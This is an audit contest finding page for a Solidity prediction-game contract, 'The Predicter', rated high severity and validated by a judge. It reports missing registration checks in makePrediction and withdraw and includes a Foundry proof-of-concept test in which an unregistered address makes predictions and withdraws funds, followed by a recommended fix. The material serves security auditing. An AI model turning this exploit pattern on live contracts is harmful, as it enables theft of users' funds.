First Flight #20: The Predicter

First Flight #20

Beginner FriendlyFoundry

100 EXP

View results

Previous Next

Submission Details

Severity: high

Valid

An unregistered player can make a prediction and withdraw funds.

elprofesor

Summary

According to the documentation, only registered players who have been approved by the Organizer can participate in the game, make predictions, and receive rewards. However, since the functions for making predictions (ThePredicter::makePrediction) and withdrawing rewards (ThePredicter::withdraw) do not include checks to verify whether a player is registered and approved by the Organizer, unregistered users can participate, make predictions, and withdraw funds without paying the entrance fee.

Impact

Unregistered users can participate, make predictions, and withdraw funds without paying the entrance fee.

PoC

function test_unregisteredPlayerCanMakePredictionAndWithdraw() public {

address stranger2 = makeAddr("stranger2");

address stranger3 = makeAddr("stranger3");

vm.startPrank(stranger2);

vm.deal(stranger2, 1 ether);

thePredicter.register{value: 0.04 ether}();

vm.stopPrank();

vm.startPrank(stranger3);

vm.deal(stranger3, 1 ether);

thePredicter.register{value: 0.04 ether}();

vm.stopPrank();

vm.startPrank(stranger);

vm.deal(stranger, 1 ether);

vm.stopPrank();

vm.startPrank(stranger);

thePredicter.makePrediction{value: 0.0001 ether}(

ScoreBoard.Result.First

);

thePredicter.makePrediction{value: 0.0001 ether}(

ScoreBoard.Result.Draw

);

vm.stopPrank();

vm.startPrank(organizer);

scoreBoard.setResult(0, ScoreBoard.Result.First);

scoreBoard.setResult(1, ScoreBoard.Result.First);

scoreBoard.setResult(2, ScoreBoard.Result.First);

scoreBoard.setResult(3, ScoreBoard.Result.First);

scoreBoard.setResult(4, ScoreBoard.Result.First);

scoreBoard.setResult(5, ScoreBoard.Result.First);

scoreBoard.setResult(6, ScoreBoard.Result.First);

scoreBoard.setResult(7, ScoreBoard.Result.First);

scoreBoard.setResult(8, ScoreBoard.Result.First);

vm.stopPrank();

vm.startPrank(stranger);

thePredicter.withdraw();

vm.stopPrank();

}

Recommendations

Add a check for player status in the functions ThePredicter::makePrediction and ThePredicter::withdraw. Alternatively, at least in the ThePredicter::makePrediction function, prevent unregistered players from making predictions, which would then ensure they have nothing to withdraw.

Updates

Lead Judging Commences

NightHawK Lead Judge about 1 year ago

Submission Judgement Published

Validated

Assigned finding tags:

makePrediction lacks access control

makePrediction has no access controls and any unapproved user can make predictions causing an incorrect calculation and distribution of rewards.

Rewards breakdown

nSLOC

191

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.